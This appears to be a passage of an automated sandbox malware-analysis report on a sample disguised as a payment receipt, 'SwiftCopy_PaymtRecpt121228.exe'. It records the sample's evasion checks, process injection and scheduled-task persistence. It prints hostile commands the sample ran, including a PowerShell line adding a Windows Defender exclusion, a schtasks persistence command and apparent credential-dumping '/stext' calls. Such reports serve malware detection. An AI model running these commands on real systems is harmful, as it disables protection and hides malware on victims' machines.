                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238609s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238484s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10006580 FindFirstFileExA,7_2_10006580
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B43F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0044D5F9 FindFirstFileExA,12_2_0044D5F9
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C79
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239828Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239718Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239609Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239499Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239390Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239281Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239172Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239062Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238953Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238830Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238712Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238556Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238422Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238285Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237937Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237669Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237562Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237453Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237342Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237234Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237119Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237010Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239874Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239656Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239544Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239437Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239326Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239212Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239094Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238937Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238718Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238484Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: eaJOpx.exe, 00000009.00000002.2121395644.000000000749C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000125A000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: eaJOpx.exe, 00000009.00000002.2121395644.000000000749C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_100060E2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h]7_2_10004AB4
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00442564 mov eax, dword ptr fs:[00000030h]12_2_00442564
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_1000724E GetProcessHeap,7_2_1000724E
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_100060E2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10002639
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_10002B1C
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434178
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A66D
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B54
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00433CE7 SetUnhandledExceptionFilter,12_2_00433CE7
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory written: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory written: C:\Users\user\AppData\Roaming\eaJOpx.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: NULL target: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: NULL target: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: NULL target: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00418764 mouse_event,12_2_00418764
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess created: C:\Users\user\AppData\Roaming\eaJOpx.exe "C:\Users\user\AppData\Roaming\eaJOpx.exe"Jump to behavior
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SProgram Manager
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bProgram Manager
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8Program Manager
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EProgram ManagerB
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GProgram Managere
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10002933 cpuid 7_2_10002933
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: GetLocaleInfoW,12_2_004510CA
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: EnumSystemLocalesW,12_2_004470BE
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511F3
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: GetLocaleInfoW,12_2_004512FA
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513C7
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: GetLocaleInfoW,12_2_004475A7
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: GetLocaleInfoA,12_2_0040E679
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A8F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: EnumSystemLocalesW,12_2_00450D52
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: EnumSystemLocalesW,12_2_00450D07
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: EnumSystemLocalesW,12_2_00450DED
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E7A
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Users\user\AppData\Roaming\eaJOpx.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
